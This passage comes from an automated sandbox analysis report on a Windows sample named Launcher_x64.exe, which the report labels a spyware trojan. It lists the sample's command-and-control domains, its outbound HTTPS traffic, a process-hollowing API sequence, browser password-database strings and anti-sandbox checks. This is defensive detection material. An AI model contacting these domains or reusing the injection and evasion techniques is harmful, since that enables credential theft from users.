                Source: Launcher_x64.exe, 00000003.00000003.1749740558.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750224448.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750974693.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750055715.000000000571A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/((j
                Source: Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/.?
                Source: Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/4
                Source: Launcher_x64.exe, 00000003.00000002.2902244222.0000000002FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/A
                Source: Launcher_x64.exe, 00000003.00000003.1749472584.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858167471.000000000571B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835630979.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826186870.0000000005715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/api
                Source: Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apiH
                Source: Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apis0
                Source: Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apite
                Source: Launcher_x64.exe, 00000003.00000002.2902316169.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969092084.000000000300E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apiw
                Source: Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/f?
                Source: Launcher_x64.exe, 00000003.00000003.1736528894.0000000005716000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.0000000003005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click:443/api
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D7EA8E0_2_00D7EA8E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D734400_2_00D73440
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D6DDE20_2_00D6DDE2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D805020_2_00D80502
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D696DB0_2_00D696DB
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D7EA8E2_2_00D7EA8E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D734402_2_00D73440
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D6DDE22_2_00D6DDE2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D805022_2_00D80502
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D696DB2_2_00D696DB
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D7670D appears 34 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D69BF0 appears 94 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D71D28 appears 42 times
                Source: Launcher_x64.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Launcher_x64.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003260588842975
                Source: Launcher_x64.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003260588842975
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/0@1/1
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                Source: Launcher_x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Launcher_x64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Launcher_x64.exe, 00000003.00000003.1693474886.0000000005749000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694099327.0000000005715000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile read: C:\Users\user\Desktop\Launcher_x64.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D69DAA push ecx; ret 0_2_00D69DBD
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D69DAA push ecx; ret 2_2_00D69DBD
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301C319 push ecx; ret 3_3_0301C31A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301C319 push ecx; ret 3_3_0301C31A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301C319 push ecx; ret 3_3_0301C31A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301C319 push ecx; ret 3_3_0301C31A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301C319 push ecx; ret 3_3_0301C31A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF4F push eax; iretd 3_3_0301CF55
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF4F push eax; iretd 3_3_0301CF55
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF4F push eax; iretd 3_3_0301CF55
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF4F push eax; iretd 3_3_0301CF55
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF4F push eax; iretd 3_3_0301CF55
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF5F pushad ; iretd 3_3_0301CF65
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF5F pushad ; iretd 3_3_0301CF65
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF5F pushad ; iretd 3_3_0301CF65
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF5F pushad ; iretd 3_3_0301CF65
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF5F pushad ; iretd 3_3_0301CF65
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF67 push 700301CFh; iretd 3_3_0301CF71
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF67 push 700301CFh; iretd 3_3_0301CF71
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF67 push 700301CFh; iretd 3_3_0301CF71
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF67 push 700301CFh; iretd 3_3_0301CF71
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CF67 push 700301CFh; iretd 3_3_0301CF71
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301E371 push ebp; retf 3_3_0301E372
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301E371 push ebp; retf 3_3_0301E372
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301E371 push ebp; retf 3_3_0301E372
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301E371 push ebp; retf 3_3_0301E372
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301E371 push ebp; retf 3_3_0301E372
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CA77 pushad ; retf 3_3_0301CAC1
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CA77 pushad ; retf 3_3_0301CAC1
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CA77 pushad ; retf 3_3_0301CAC1
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_3_0301CA77 pushad ; retf 3_3_0301CAC1
                Source: C:\Users\user\Desktop\Launcher_x64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Launcher_x64.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeWindow / User API: threadDelayed 6337Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 7392Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 7664Thread sleep count: 6337 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Launcher_x64.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Launcher_x64.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D7B799
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D7B6E8 FindFirstFileExW,2_2_00D7B6E8
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00D7B799
                Source: Launcher_x64.exe, Launcher_x64.exe, 00000003.00000003.1793226987.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902316169.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969092084.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902182465.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.000000000300E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D69A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D69A73
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D9019E mov edi, dword ptr fs:[00000030h]0_2_00D9019E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D61BA0 mov edi, dword ptr fs:[00000030h]0_2_00D61BA0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D61BA0 mov edi, dword ptr fs:[00000030h]2_2_00D61BA0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D77020 GetProcessHeap,0_2_00D77020
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D69A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D69A73
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D69A67 SetUnhandledExceptionFilter,0_2_00D69A67
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D71A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D71A60
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D696B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D696B3
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D69A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D69A73
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D69A67 SetUnhandledExceptionFilter,2_2_00D69A67
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D71A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D71A60
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D696B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D696B3

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D9019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00D9019E
                Source: C:\Users\user\Desktop\Launcher_x64.exeMemory written: C:\Users\user\Desktop\Launcher_x64.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: undesirabkel.click
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D7B0C5
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D768FD
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D7B1B7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D7B110
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D7B2BD
